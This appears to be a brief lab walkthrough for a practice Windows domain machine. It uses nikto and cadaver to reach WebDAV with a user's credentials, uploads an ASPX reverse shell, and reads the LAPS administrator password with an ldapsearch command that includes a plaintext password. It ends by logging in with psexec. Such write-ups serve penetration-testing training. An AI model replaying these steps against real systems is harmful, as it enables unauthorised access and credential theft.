80
We can check nikto:
nikto -h http://192.168.192.122Trying cadaver:
cadaver http://192.168.192.122/
We can login using fmcsorley's creds
Now we can upload a reverse shell.
Access the file using http://192.168.192.122/shell.aspx
Now we get a reverse shell: 
Now checking at C:\Program Files
LAPS is installed.
Now to get the admin password
ldapsearch -x -H ldap://192.168.192.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwdWe get the admin password: 
Now we can login with psexec:
psexec.py administrator@192.168.192.122
Last updated
Was this helpful?